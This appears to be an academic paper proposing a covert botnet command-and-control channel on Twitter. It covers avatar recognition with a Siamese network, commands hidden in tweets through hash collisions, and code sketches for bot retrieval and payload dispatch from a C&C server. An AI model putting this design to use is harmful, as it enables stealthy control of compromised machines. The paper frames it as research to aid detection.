AI-powered Covert Botnet Command and Control on OSNs

09/16/2020
by Zhi Wang, et al.

Botnets are among the major threats to computer security. In previous botnet command and control (C&C) scenarios using online social networks (OSNs), the methods for finding the botmaster (e.g., IDs, links, DGAs) are hardcoded into bots. Once a bot is reverse engineered, the botmaster is exposed. Meanwhile, abnormal contents from explicit commands may expose the botmaster and raise anomalies on OSNs. To overcome these deficiencies, we propose an AI-powered covert C&C channel. By leveraging neural networks, bots can find the botmaster by avatars, which are converted into feature vectors. Commands are embedded into normal contents (e.g., tweets, comments) using text data augmentation and hash collision. Experiments on Twitter show that the command-embedded contents can be generated efficiently, and that bots can find the botmaster and obtain commands accurately. By demonstrating how AI may help promote covert communication on OSNs, this work provides a new perspective on botnet detection and confrontation.


I Introduction

Botnets are among the most serious threats in computer security today. A botnet refers to a group of compromised computers that are remotely controlled by a botmaster via command and control (C&C) channels [1]. Based on botnets, multiple types of cyber attacks can be launched, such as DDoS (Distributed Denial of Service), spam, cryptocurrency mining, etc. Compared to other Internet malware, the major feature of a botnet is its one-to-many C&C channel. The C&C channel is the essential component of a botnet: it receives commands from botmaster and forwards them to bots.

Traditional C&C channels are built on IRC, HTTP, P2P and other protocols. As botnet detection has evolved, the construction of C&C channels has paid more attention to concealment and begun to utilize public services [29] such as social networks, cloud drives, online clipboards, disposable e-mail, etc. Hammertoss (APT-29) [8] was reported to use popular web services like Twitter and GitHub to publish control commands and hide communication traces. HeroRat [23] used Telegram for C&C communication on Android devices. In 2020, Turla [7] was reported to utilize Gmail to receive commands and exfiltrate information to the operators. These kinds of C&C channels do not require attackers to deploy their own servers, and defenders cannot shut down the whole botnet by destroying the C&C servers.

However, methods of constructing C&C channels on web platforms still have deficiencies. To help bots find botmaster, account information about botmaster (e.g., IDs, links, tokens, DGAs) has to be hardcoded into bots (see Table I). Once bots are analyzed by adversaries, botmaster is exposed and C&C activities can be monitored or interrupted. Meanwhile, in most cases, commands are published in plain, encoded or encrypted form (see Fig. 1). Such abnormal contents expose C&C activities and raise anomalies on OSNs, which may trigger restrictions on botmaster's account and interrupt C&C activities. When the hardcoded accounts are blocked by OSNs, it is hard for bots to retrieve new commands and recover the C&C channel. To build anomaly-resistant C&C communication on OSNs, Pantic et al. [18] proposed a method that embeds commands into tweets using tweet metadata (length). The length of a tweet represents an ASCII code in decimal. As a tweet has a maximum length of 140, 7 bits can be conveyed through one tweet. While commands can be issued stealthily, the system has a low capacity: it needs to post N tweets to publish a command of length N.

Year Name OSNs Identity CMD
2009 upd4t3 [17] Twitter ID Base64
2012 - [22] Twitter Token Plain
2014 Graybot [21] Twitter Token Encrypted
2015 Hammertoss [8] Twitter DGA Plain
2015 MiniDuke [5] Twitter DGA Base64
2015 - [18] Twitter DGA Tweets
2017 ROKRAT [27] Twitter ID, Token Plain
2017 PlugX [14] Pastebin URL XOR
2018 Comnie [11] GitHub URL Base64, RC4
2019 DarkHydrus [6] GoogleDrive URL Plain
TABLE I: Carriers for Building C&C Channels
Fig. 1: Commands Posted by Hammertoss and MiniDuke

These problems can be solved by introducing AI technology. Artificial intelligence (AI) was first proposed in 1956 with the goal of giving machines the ability to perceive, learn, think, make decisions and act like humans. AI has been widely applied in various fields, including cyber security, where its integration has produced many achievements in malware monitoring, intrusion detection, situation analysis, anti-fraud, etc.

Here is the main idea of this work. Botmaster first posts contextual command-embedded contents on an OSN platform (we take Twitter and tweets as the example). Then bots find botmaster through avatars with the help of a neural network model, and parse commands from botmaster's tweets. To achieve this, botmaster needs to train a neural network model, prepare some pictures as future avatars, and extract feature vectors of the pictures through the trained model. The vectors and the model are distributed with bots. When publishing a command, botmaster chooses trending topics synchronously with bots, generates contextual, readable, command-embedded tweets using data augmentation and hash collision, and posts the tweets. Bots crawl tweets under the trending topic along with the tweeters' avatars, then identify botmaster by comparing the avatars against the selected vector through the neural network model. If bots find their master, the command can be parsed by calculating the hashes of the master's tweets. Due to the poor explainability of neural network models, it is difficult for adversaries to find botmaster in advance even if the models and vectors are leaked, which ensures the security of botmaster's accounts. Also, contextual tweets eliminate the anomalies caused by abnormal contents and conceal the intent of botmaster even if the tweets are exposed to the public.

Our contributions are threefold:

  • We introduce neural networks to solve the problem of hardcoding in C&C communications. By using feature vectors of avatars and an AI model, it is easy for bots to find botmaster while hard for adversaries to locate botmaster in advance.

  • We propose a method to embed commands into natural semantic tweets to avoid anomalies caused by abnormal contents and conceal the intent of botmaster. Data augmentation and hash collision are used in this process.

  • We conduct experiments on Twitter to demonstrate the feasibility of the proposed methods and analyze their efficiency, capacity and security. We also discuss possible countermeasures to mitigate this kind of attack.

The combination of AI and cyber attacks is considered an upward trend. We intend to provide a possible scenario for security researchers and vendors to prevent this kind of attack and prompt preparations in advance.

The remainder of this paper is structured as follows. Section II describes relevant background on the techniques in this work. Section III presents the methodology for building the covert C&C channel. Detailed implementations of the different parts are demonstrated in Section IV. Section V evaluates the experiments. Section VI contains the discussion and works related to this paper. Conclusions are summarized in Section VII.

II Background

II-A Siamese Neural Network

The Siamese neural network [2] is effective in measuring the similarity between two inputs. The two inputs accepted by a Siamese neural network are fed into two identical neural networks to generate two outputs. Like Siamese twins sharing organs, the identical neural networks share the same architecture and weights. By calculating the distance between the two outputs, the similarity between the two inputs can be measured: if the distance is below a threshold, the inputs can be considered similar. In recent years, the Siamese neural network has been widely used for human identification, object tracking, information retrieval, etc. [20]

Fig. 2 shows the architecture of a Siamese neural network. In this work, the two identical neural networks are CNNs. The CNN (Convolutional Neural Network) [15] is one of the most popular neural networks and excels in speech recognition, image recognition and segmentation, natural language processing, etc. Here, the CNN is used to extract feature vectors of avatars: images input into the CNN are converted into vectors of the same length. A contrastive loss function [12] is used to backpropagate the error and train the model.

Fig. 2: Architecture of Siamese Neural Network

II-B Text Data Augmentation

Data augmentation is a technique used in AI to solve the problem of insufficient training data. Training neural networks requires a lot of data. By applying data augmentation, researchers can enlarge an existing dataset to meet the needs of training and improve the robustness and generalization performance of neural network models.

In this work, botmaster needs to generate numerous tweets for hash collision. Wei and Zou [28] proposed easy data augmentation (EDA) techniques in 2019. They use Synonym Replacement (SR), Random Insertion (RI), Random Swap (RS) and Random Deletion (RD) to generate sentences with meanings similar to given sentences. Examples of EDA are shown in Table II with an original sentence from [3].

The augmented sentences may not be grammatically and syntactically correct, and may vary in meaning. But the Internet is diverse and inclusive, and people have different opinions. Botmaster should ensure the tweets have natural semantics but does not need them to be "correct". (A minimal sketch of the four EDA operations follows Table II.)

Operation Sentence
None I shall certainly try to make my portraits as true to life as possible.
SR I shall certainly try to make my portrayal as true to life as possible.
RI I shall certainly try to make my portraits as true essay to life as possible.
RS I shall possible try to make my portraits as true to life as certainly.
RD I shall certainly try to my portraits as true to life as possible.
SR: synonym replacement. RI: random insertion.
RS: random swap. RD: random deletion.
TABLE II: Sentences Generated by EDA
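To make the four operations concrete, here is a minimal Python sketch. The toy synonym table is our placeholder: EDA [28] draws synonyms from WordNet, and the real implementation applies each operation with tuned probabilities rather than uniformly at random.

```python
import random

# Toy synonym table for illustration; EDA [28] draws synonyms from WordNet.
SYNONYMS = {"portraits": ["portrayal"], "certainly": ["surely"], "true": ["faithful"]}

def eda_variants(sentence, n=50):
    """Generate up to n rough variants of a sentence using SR, RI, RS and RD."""
    words = sentence.split()
    variants = set()
    for _ in range(4 * n):                     # extra attempts to offset duplicates
        w, op = words[:], random.choice("SIWD")
        if op == "S":                          # synonym replacement (SR)
            idx = [i for i, t in enumerate(w) if t.lower() in SYNONYMS]
            if idx:
                i = random.choice(idx)
                w[i] = random.choice(SYNONYMS[w[i].lower()])
        elif op == "I":                        # random insertion (RI) of a synonym
            syn = random.choice([s for v in SYNONYMS.values() for s in v])
            w.insert(random.randrange(len(w) + 1), syn)
        elif op == "W" and len(w) >= 2:        # random swap (RS)
            i, j = random.sample(range(len(w)), 2)
            w[i], w[j] = w[j], w[i]
        elif op == "D" and len(w) >= 2:        # random deletion (RD)
            del w[random.randrange(len(w))]
        variants.add(" ".join(w))
        if len(variants) >= n:
            break
    return list(variants)
```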
                Profiles         Posts            Comments         Pictures                    Trends
OSN             Login Area All   Login Area All   Login Post All   Compress Watermark Resize   Login Area All
facebook.com    N     N    C     N     N    Y     N     Y    Y     Y        N         N        -     -    -
twitter.com     N     N    Y     N     N    C     N     Y    C     Y        N         N        N     R    Y
instagram.com   Y     N    Y     Y     N    C     Y     Y    Y     Y        N         O        Y     N    Y
weibo.com       N     N    C     N     N    C     N     Y    Y     Y        Y         Y        N     N    Y
tumblr.com      N     N    Y     N     N    Y     N     Y    C     Y        N         Y        N     N    Y
imgur.com       N     N    Y     N     N    Y     N     Y    Y     Y        N         N        N     N    Y
pixnet.net      N     N    C     N     N    Y     N     Y    Y     Y        N         Y        N     N    Y
pinterest.com   Y     N    Y     Y     N    Y     Y     Y    Y     Y        N         N        R     Y    N
facebook.com does not provide trends.
Login – Login to view, Area – Area restrictions, All – All content is available, Post – Login to post
Y – Yes, N – No, O – Occasionally, C – Customized by user, R – Restrictions that can be bypassed
TABLE III: Content Access Restrictions of Alexa Top OSN Sites

II-C Online Social Networks

Online Social Networks (OSNs) connect people across the world. OSNs are open, creative, and portable. Users get access to OSNs anywhere with a networked device. Everyone can create, save and share contents in different forms (e.g. text, images, videos, etc.) on OSNs, or forward and comment on any contents they are interested in. Generally, visiting OSNs is allowed by most antivirus software and network security equipment like firewall. Data transmitted from OSNs to end devices are encrypted and protected by TLS. These features of OSNs guarantee content security during data transmission and meet demands for building a good C&C channel.

Due to different considerations and privacy settings on users' profiles, statuses, etc., content access permissions vary across OSNs. Some OSNs limit contents to authenticated users, while others have no restrictions and everyone can access all contents on the platform. Table III lists the content access restrictions of Alexa top OSN sites. Attackers can utilize the non-restricted parts to convey customized information to others (including bots). In this work, to demonstrate the feasibility of the methods, we choose Twitter to build the C&C channel. The commands are embedded in tweets and posted by botmaster. The command-embedded tweets have natural semantics, so no abnormal contents are posted on Twitter in this scenario, which also guarantees behavioral security for botmaster.

Fig. 3: Workflow of Botmaster and Bot

III Approach Overview

In this section we will introduce methodologies for building a covert botnet C&C channel on OSNs.

III-A Overall Workflow

As mentioned in Section I, in this work, botmaster needs to train a neural network model to extract feature vectors from some prepared images and distribute the vectors and the model with bots. To publish a command, botmaster needs to select trending topics, then generate and post contextual tweets. Bots need to crawl tweets under a topic, identify botmaster's account by avatars using the neural network model, and get the command from the tweets. Fig. 3 shows the workflow of the process, which contains 3 stages.

III-A1 Preparation

Botmaster gets bots ready for C&C activities in this stage. To this end, botmaster needs to prepare some pictures as future Twitter avatars. Botmaster also needs to train a neural network model to extract feature vectors from these avatars (see Fig. 4). The high-dimensional features are built into bots so that bots can identify botmaster accurately when retrieving commands. Botmaster also needs to design a set of rules for selecting avatars, vectors and Twitter trends. Bots are built with the rules and distributed along with the vectors and the model. Each avatar and vector is used only once to prevent replay attacks. After publishing a command, the Twitter account is considered unsafe, and it is not recommended to reuse it. Therefore, botmaster also needs to maintain some Twitter accounts for publishing commands multiple times.

Fig. 4: Extract Features using Neural Networks

III-A2 Publish Commands

In this stage, botmaster publishes commands on Twitter for bots to retrieve. Botmaster selects an avatar and trending topics according to the rules agreed with bots. To generate numerous tweets for hash collisions, botmaster needs to crawl some tweets under the trending topic. New tweets are then generated using EDA, and hash collisions are performed to embed commands into the tweets. After successful collisions, botmaster posts the command-embedded tweets on Twitter.

III-A3 Get Commands

Bots select a vector that represents botmaster and a trending topic as agreed. Then bots crawl tweets and tweeters' avatars under the selected trend. After that, bots calculate the distances between the crawled avatars and the selected vector using the neural network model to identify botmaster. If a distance is below the threshold, botmaster's account is considered found. Bots then calculate the hashes of the tweets posted by botmaster to get commands. (A sketch of this bot-side loop follows.)
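As an illustration, the bot-side loop might look like the following sketch, where `snn_distance` is a hypothetical wrapper around the Siamese model, `candidates` stands for the crawled (avatar, tweets) pairs, and the 0.02 threshold comes from Section IV-B2:

```python
import hashlib

THRESHOLD = 0.02  # Euclidean-distance threshold from Section IV-B2

def get_command(candidates, snn_distance, target_vector):
    """candidates: iterable of (avatar_image, [tweet_text, ...]) per tweeter,
    tweets given oldest-first. snn_distance: hypothetical wrapper that runs an
    avatar and a stored vector through the Siamese model and returns the distance."""
    for avatar, tweets in candidates:
        if snn_distance(avatar, target_vector) < THRESHOLD:
            # Botmaster found: the first 2 bytes of each command tweet's SHA-256,
            # concatenated in post order, form the 4 bytes of the IP (Section IV-C2).
            raw = b"".join(hashlib.sha256(t.encode("utf-8")).digest()[:2]
                           for t in tweets[:2])
            return ".".join(str(byte) for byte in raw)
    return None  # botmaster not in this batch; keep crawling
```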

III-B Threat Model

In this work, we consider adversaries to be third parties unrelated to the attackers and the OSNs. Adversaries have access to the vectors extracted from the prepared pictures and to the structure, weights, implementation and other detailed information of the neural network model. Adversaries also have the ability to reverse engineer the bot program to obtain the detailed implementation of a bot.

III-C Technical Design

III-C1 Neural Network Model

A neural network model is used to protect botmaster's accounts and conceal the intent of bots, as it is very difficult for adversaries to obtain the accounts in advance even if they get the model and the vectors. Thus, with a neural network model, the hardcoding problem in current works can be solved.

Fig. 5: Usage of Neural Network Model

The model is used differently by botmaster and bots, as shown in Fig. 5. For botmaster, the model helps to extract features from avatars. Botmaster feeds the model a batch of pictures that will become avatars, and the model outputs a batch of vectors that represent the pictures. Both the vectors and the model are built into bots. For bots, the model is used to calculate the distances between avatars from Twitter users and the built-in vectors to identify botmaster. A selected vector and a crawled avatar are fed into the model, and the model outputs the distance between the inputs. By comparing the distance with a threshold, bots can determine whether the avatar is from botmaster or not.

As pictures uploaded to OSNs get compressed or resized, avatar files differ from the original pictures. So the model should have good generalization ability: it must identify botmaster accurately without mistakenly identifying someone else as botmaster. To prevent replay and enhance security, it is recommended that each avatar and vector be used only once. Botmaster changes the current account and avatar when a command is issued, and bots delete the used vectors. During the experiments in this work, because of limited resources (Twitter accounts), we chose to reuse one account to publish all testing tweets. Fortunately, no third party traced us back, and no abnormal contents were produced or left on Twitter.

III-C2 Meeting Point for Botmaster and Bots

While bots cannot quickly find botmaster among Twitter users without hardcoded rules, Twitter trends provide a meeting point for them. Twitter trends change with the tweet volumes under different topics and are updated every 5 minutes, which makes them difficult to predict. Since ordinary users also discuss the trending topics, botmaster can hide among them. After selecting trending topics and embedding commands, botmaster posts the command-embedded tweets under the trend. Bots also select a trending topic according to the agreed rule and crawl a lot of tweets under the trend along with the tweeters' avatars. Then bots start identifying botmaster by its avatar. As botmaster's avatar is converted to a vector and distributed with bots, bots can pick botmaster out quickly by comparing distances using the neural network model.

III-C3 Embedding of Commands

Content security and behavioral security are of equal importance in covert communication. In previous works, when plain commands are posted on Twitter, the commands are known to all Twitter users, which violates both of the principles above. When botmasters post encoded or encrypted commands, content security is ensured but behavioral security is lost, as the accounts of botmasters are exposed to others; moreover, abnormal contents raise anomalies on OSNs. In this work, tweets posted by botmaster have natural semantics and do not contain strange characters, just like any other tweets. Also, any ordinary user on Twitter could be botmaster if it set the chosen avatar and posted under specific trends at a specific time. Commands are embedded into tweets generated by EDA through hash collision. The command-embedded tweets are posted by botmaster. After bots find botmaster, commands can be obtained by calculating the hashes of the tweets.

IV Implementation

In this section, we demonstrate that the proposed covert C&C channel is feasible by presenting a proof-of-concept on Twitter.

IV-A Twitter Avatars, Trends and API

In this work, bots try to find botmaster through avatars using a neural network model. Twitter provides 4 different sizes of avatars: normal (48x48), bigger (73x73), 200x200 and 400x400 (see Table IV). The links to these avatars of the same user are identical except for the size suffix. Default avatars returned by Twitter are in size 48x48. According to a preliminary experiment (described in Appendix A), of all 6 combinations of the 4 sizes, avatars in bigger sizes from the same user have a smaller distance. So bots use avatars in size 400x400 to identify botmaster. Bots can get the links to 400x400 avatars by simply replacing the suffix in the links, as sketched below.
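For example, the suffix replacement can be a one-liner (a sketch following the link pattern in Table IV):

```python
def full_size_avatar(url):
    """Rewrite a default 48x48 avatar link (suffix "_normal") to 400x400."""
    return url.replace("_normal", "_400x400")
```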

In the experiments, Twitter APIs are used to get trends, tweets and avatars for botmaster and bots. The Twitter Trends API returns the top 50 topics in a chosen area specified by a location ID (WOEID, Where On Earth ID). The default WOEID 1 stands for worldwide trends. Detailed tweet volumes are returned for topics with more than 10K tweets over the past 24 hours. Botmaster can design a proper rule to select trending topics synchronously with bots, so as to get enough tweets for EDA and hash collision while hiding among normal users. In the experiments, we get trends from Johannesburg, South Africa (whose WOEID is 1582504) via the Twitter API and select the last trend above 10K discussions from the returned trends (see the sketch below).
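A sketch of this selection rule, assuming the parsed JSON layout of the v1.1 trends/place endpoint; the rule itself is a free parameter agreed between botmaster and bots:

```python
def select_trend(trends_response):
    """Pick the last trend with more than 10K tweets, per the agreed rule.
    trends_response: parsed JSON from the v1.1 trends/place endpoint."""
    trends = trends_response[0]["trends"]
    busy = [t for t in trends if (t.get("tweet_volume") or 0) > 10_000]
    return busy[-1]["name"] if busy else None
```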

Size Link
400x400 https://pbs.twimg.com/profile_images/942858479592554497/BbazLO9L_400x400.jpg
200x200 https://pbs.twimg.com/profile_images/942858479592554497/BbazLO9L_200x200.jpg
73x73 https://pbs.twimg.com/profile_images/942858479592554497/BbazLO9L_bigger.jpg
48x48 https://pbs.twimg.com/profile_images/942858479592554497/BbazLO9L_normal.jpg
TABLE IV: Links for different sizes of avatars of the same user

The Twitter Standard Search API is used to get tweets and avatar links. We use the UTF-8, URL-encoded trending topics as search queries. We set the language of returned tweets to English and the count to 100 in the query requests. Tweets returned by the API are sorted by post time from newest to oldest. The response includes each tweet's status (ID, full text, language, retweet status, creation time, etc.) and the tweeter's ID, name, profile image URL, following status, etc. More details on the Twitter APIs are listed in the Twitter Developer Documentation [25].

Since Twitter has restricted applications for developer accounts, attackers may not use the Twitter API directly. There are third parties that provide queries for Twitter contents, including tweets, trends and user profiles. They can be utilized by attackers to build the C&C communication between botmaster and bots. Also, in a real botnet scenario, attackers may write their own implementations that use raw HTTP requests to get the needed contents, although this would violate the Twitter Terms of Service (ToS) [24]. To avoid violating the Twitter ToS, we chose to use the Twitter API in the experiments.

In accordance with the ToS, all contents crawled from Twitter for the proof-of-concept tests (avatars and tweets) were deleted within 24 hours. Contents for training and evaluation were deleted after the tasks were completed. Contents crawled by bots and botmaster are stored in memory and released after use.

IV-B Siamese Neural Network

IV-B1 Architecture

As mentioned above, a CNN is used in the Siamese network to extract features from images. Table V shows the architecture of the CNN used in this work. It consists of 4 convolutional layers and 3 fully connected layers. The activation functions between convolutional layers are Tanh, and between fully connected layers are ReLU. To increase the uncertainty of vector generation, we introduce a compression process for the avatars. The avatars are 3-channel JPG or JPEG pictures and are resized to 128x128 before being fed into the model. The CNN accepts a 3-channel 128x128 image as input and generates 128 outputs that make up a feature vector. (A PyTorch reconstruction of this branch follows Table V.)

Inside the SNN are 2 identical CNNs. During training, the SNN accepts 2 images as inputs and calculates the distance between them. The 2 images are first converted into two feature vectors by the CNNs. Then the Euclidean distance between the vectors is calculated to measure the similarity of the two images. A smaller distance means a higher similarity between the inputs.

We use the contrastive loss function proposed by Hadsell et al. in 2006 [12] as the loss function of the Siamese neural network. For two image inputs $X_1$ and $X_2$ of the identical CNNs, $Y$ is a binary label assigned to the pair, where $Y=0$ represents similar images and $Y=1$ different images. $G_W(X_1)$ and $G_W(X_2)$ are the two vectors generated by the identical CNNs with weights $W$. Let $D_W = \lVert G_W(X_1) - G_W(X_2) \rVert_2$ be the Euclidean distance between the vectors and $m > 0$ be a margin (a radius around $G_W(X_1)$). The loss function is:

$$L(W, Y, X_1, X_2) = (1 - Y)\,\frac{1}{2}\,D_W^2 + Y\,\frac{1}{2}\,\big\{\max(0,\; m - D_W)\big\}^2$$
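A minimal PyTorch sketch of this loss (our own translation of the formula above, not the authors' code):

```python
import torch
import torch.nn.functional as F

def contrastive_loss(x1, x2, y, margin=1.0):
    """Contrastive loss [12]; y = 0 for similar pairs, y = 1 for dissimilar pairs."""
    d = F.pairwise_distance(x1, x2)               # Euclidean distance D_W
    similar = (1 - y) * 0.5 * d.pow(2)            # pulls similar pairs together
    dissimilar = y * 0.5 * torch.clamp(margin - d, min=0).pow(2)  # pushes apart up to m
    return (similar + dissimilar).mean()
```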

layer size-in size-out kernel, stride
conv1 128×128×3 122×122×6 7×7×6, 1
Tanh
pool1 122×122×6 61×61×6 2×2×1, 2
conv2 61×61×6 56×56×16 6×6×16, 1
Tanh
pool2 56×56×16 28×28×16 2×2×1, 2
conv3 28×28×16 24×24×32 5×5×32, 1
Tanh
pool3 24×24×32 12×12×32 2×2×1, 2
conv4 12×12×32 8×8×48 5×5×48, 1
Tanh
pool4 8×8×48 4×4×48 2×2×1, 2
fc1 1×768×1 1×512×1
ReLU
fc2 1×512×1 1×256×1
ReLU
output 1×256×1 1×128×1
Size 2.36MB
TABLE V: Architecture of CNN
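Read off Table V, one possible PyTorch reconstruction of this CNN branch (illustrative; the layer sizes follow the table, everything else is assumed):

```python
import torch.nn as nn

class AvatarCNN(nn.Module):
    """One branch of the Siamese network, with layer sizes from Table V."""
    def __init__(self):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv2d(3, 6, 7), nn.Tanh(), nn.MaxPool2d(2),    # 128x128x3 -> 61x61x6
            nn.Conv2d(6, 16, 6), nn.Tanh(), nn.MaxPool2d(2),   # -> 28x28x16
            nn.Conv2d(16, 32, 5), nn.Tanh(), nn.MaxPool2d(2),  # -> 12x12x32
            nn.Conv2d(32, 48, 5), nn.Tanh(), nn.MaxPool2d(2),  # -> 4x4x48
        )
        self.fc = nn.Sequential(
            nn.Linear(4 * 4 * 48, 512), nn.ReLU(),
            nn.Linear(512, 256), nn.ReLU(),
            nn.Linear(256, 128),                               # 128-d feature vector
        )

    def forward(self, x):
        return self.fc(self.features(x).flatten(1))
```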

IV-B2 Training

To train the model, we crawled avatars in different sizes from 115,887 Twitter users and randomly selected avatars from 19,137 users to build the training and testing sets. We randomly choose avatars in size 400x400 to make up input pairs with label 1. Due to the lack of the original pictures of the avatars, we use avatars in sizes 200x200 and 400x400 from the same user to make up input pairs with label 0. The ratio of input pairs marked 0 and 1 is 1:2. Finally, we got 19,137 "same" image pairs and 38,274 "different" image pairs. We use 75% of them for training and 25% for testing. The threshold for the Euclidean distance is set to 0.02 (see Appendix B): if the distance is lower than 0.02, two inputs are considered similar; if higher, they are considered different. (A sketch of the pair construction follows.)
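A sketch of this pair construction, assuming a hypothetical `avatars` mapping from user ID to the two image sizes:

```python
import random

def build_pairs(avatars):
    """avatars: hypothetical dict user_id -> {"200": image, "400": image}.
    Emits one "same" pair (label 0) and two "different" pairs (label 1) per user."""
    ids = list(avatars)
    pairs = []
    for u in ids:
        pairs.append((avatars[u]["200"], avatars[u]["400"], 0))      # same user
        for _ in range(2):
            v = random.choice(ids)
            while v == u:
                v = random.choice(ids)
            pairs.append((avatars[u]["400"], avatars[v]["400"], 1))  # different users
    return pairs
```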

IV-B3 Performance

To test the performance, we conducted the training process several times. The model converges quickly during training: after 10-20 epochs, 100% accuracy on the test set is obtained. The size of a trained Siamese neural network model is 2.42MB. We use avatars from all 115,887 users to make up the evaluation set, 463,544 pairs in total (115,887 pairs with label 0 and 347,657 pairs with label 1, a 1:3 ratio). Evaluations show that the model reaches an accuracy of more than 99.999%, with only 2-4 pairs mislabeled. Different from traditional machine learning works, we need to avoid the hijacking of botmaster's accounts, which means mislabeling from 1 to 0 (different to same) is forbidden, while a small amount of mislabeling from 0 to 1 can be tolerated. The original labels of the mislabeled pairs are all 0, which means no avatar collisions happened with the trained models; this ensures the security of botmaster's accounts.

IV-C Tweets Generation and Hash Collision

IV-C1 Commands

In this work, we take publishing an IP address (of the C&C server) as an example to illustrate the process of publishing commands. As tweets posted by botmaster have natural semantics, the information conveyed by a tweet is limited and insufficient to launch an attack. So botmaster conveys the address of a C&C server to bots. Detailed payloads for a botnet campaign and updates of the model and vectors are delivered through the server. For tasks that do not need payloads (e.g., taking a screenshot, rebooting the computer, self-destruction), commands can also be published in the form of an IP, as private IPs can be utilized here. For example, if bots receive a public IP, they connect to it and get detailed payloads from the C&C server. If bots receive an IP that starts with 10 or 127, they decode the second byte of the IP to get a number that represents a command. Authentication between botmaster and bots is conducted on the C&C server. (A sketch of this convention follows.)
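A sketch of this convention; the command-number mapping and the `fetch_payload` helper are hypothetical placeholders:

```python
import ipaddress

# Hypothetical mapping of the second byte to payload-free commands.
BUILTIN = {1: "screenshot", 2: "reboot", 3: "self_destruct"}

def dispatch(ip_str, fetch_payload):
    """Interpret a decoded IP: prefixes 10/127 encode built-in commands; any
    other address is treated as a C&C server to pull detailed payloads from."""
    packed = ipaddress.ip_address(ip_str).packed
    if packed[0] in (10, 127):
        return BUILTIN.get(packed[1])
    return fetch_payload(ip_str)   # authentication happens on the C&C server
```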

IV-C2 Hash Collision

Botmaster embeds commands into tweets by hash collision. To convey an IP address to bots through tweets, botmaster first splits the IP address into 2 parts, as shown in Fig. 6. Each part is expressed in hexadecimal. For each generated tweet, botmaster calculates its hash and checks whether the first 16 bits of the hash are identical to one IP part. If both parts of an IP address are collided, the hash collision succeeds. Botmaster posts the collided tweets in order. When bots have identified botmaster, they calculate the hashes of the tweets posted by botmaster and concatenate the first 2 bytes of the hashes, in order, to recover the IP address. In this way, 16 bits can be conveyed in one tweet. We do not recommend conveying a whole IP address at one time, because it needs too many tweets to achieve a successful collision; two 16-bit parts reduce the computation greatly. (Both sides of this scheme are sketched after Fig. 6.)

Fig. 6: Hash Collision
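Both sides of the scheme can be sketched as follows, using SHA-256 as in Section V-B2 (a simplified sketch, not the authors' implementation):

```python
import hashlib

def embed_ip(ip, candidate_tweets):
    """Find one tweet per 16-bit half of the IP whose SHA-256 starts with that half."""
    a, b, c, d = (int(x) for x in ip.split("."))
    targets = [bytes([a, b]), bytes([c, d])]
    chosen = [None, None]
    for tweet in candidate_tweets:
        prefix = hashlib.sha256(tweet.encode("utf-8")).digest()[:2]
        for i, target in enumerate(targets):
            if chosen[i] is None and prefix == target:
                chosen[i] = tweet
    return chosen  # post chosen[0] then chosen[1]; on a miss, add noise and retry

def extract_ip(tweet1, tweet2):
    """Bot side: concatenate the first 2 bytes of each tweet's hash into the IP."""
    raw = hashlib.sha256(tweet1.encode("utf-8")).digest()[:2] + \
          hashlib.sha256(tweet2.encode("utf-8")).digest()[:2]
    return ".".join(str(byte) for byte in raw)
```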

IV-C3 Tweets Generation

To perform a successful collision, botmaster needs numerous tweets. The new tweets are generated using EDA, as described in II-B. After selecting a trend, botmaster crawls tweets under the trend to generate more sentences. In the experiments, 1K tweets are crawled for each selected trend via the Twitter API. Before using the crawled tweets to generate new sentences with EDA, we clean them first. As EDA performs word deletion and swapping, the sentences generated from a too-short tweet may not contain the trending words, so we filter out tweets with fewer than 10 words. Also, retweets do not contain the trending words, so we filter them out and retain only the original tweets. Then we remove emojis, links, tabs, line breaks and all punctuation except ".", "!", "?" in each tweet. Duplicate tweets are removed last. Normally 400 to 900 tweets remain. We use EDA to generate 50 sentences for each tweet, which gets us 20K to 45K new sentences. This is still insufficient for hash collision. We convert all sentences to upper case and add punctuation (".", "..", "…", "!", "!!" and "!!!") at the end of each sentence. This results in 140K to more than 300K sentences in total, which greatly increases the success rate of hash collision (see V-B2). (A sketch of this pipeline follows.)
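A sketch of this cleaning and expansion pipeline; the regexes and the retweet heuristic are our assumptions, and the 7-fold `expand` step is one possible reading of the case/punctuation conversion:

```python
import re
import string

KEEP = {".", "!", "?"}
ENDINGS = (".", "..", "…", "!", "!!", "!!!")

def clean(tweets):
    """Drop retweets and short tweets; strip links, emojis and most punctuation; dedupe."""
    out = []
    for t in tweets:
        if t.startswith("RT @") or len(t.split()) < 10:
            continue
        t = re.sub(r"https?://\S+", "", t)                     # links
        t = "".join(c for c in t if c in KEEP or c not in string.punctuation)
        t = re.sub(r"[^\x20-\x7e]", " ", t)                    # emojis, tabs, line breaks
        out.append(re.sub(r"\s+", " ", t).strip())
    return list(dict.fromkeys(out))                            # remove duplicates

def expand(sentences):
    """Multiply the EDA output: originals plus upper-cased variants with endings (7x)."""
    return list(sentences) + [s.upper() + p for s in sentences for p in ENDINGS]
```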

A successful hash collision is not guaranteed. If a collision fails, botmaster can add some noise (e.g., other punctuation) to the sentences and try again. When more than one sentence collides for one part, botmaster can pick one randomly or by preference. Botmaster needs to post the 2 final tweets in order so that bots can recover the IP address correctly.

V Evaluation

V-A Experiments on Twitter

We use 7 virtual private servers (VPSs) in different areas (see Table VI) to simulate bots around the world. We prepared 40 photos taken with mobile phones as avatars for botmaster's accounts. The photos were cut to size 400x400 and converted into vectors by a trained model. Bots are installed with the model and vectors. In this experiment, bots and botmaster select a trend once an hour. Botmaster posts the tweets within 5 minutes, and bots crawl related tweets 5 minutes after the selection of the trend. Commands consist of IP addresses from the VPSs, private IPs and addresses from a threat report [10]. Each time botmaster completes a hash collision, it is recorded in a log file; each time the bots crawl a batch of tweets and start and finish comparisons, this is also recorded in a log file. Afterwards, the logs were collected to compare post time with retrieval time and to match the original commands with the commands decoded by bots. Due to the time zone differences between botmaster and bots, the recorded time was set to UTC.

Location Time cost (s)
Region City Avg. Min. Max.
South Asia Bangalore 81.51 34 267
East Asia Tokyo 14.59 5 36
Americas Toronto 16.56 6 60
Americas Virginia 12.13 5 23
Europe Amsterdam 15.19 6 27
Australia Sydney 35.26 12 292
Middle East Dubai 46.92 21 102
TABLE VI: VPS Distribution and Time Cost for Finding Botmaster

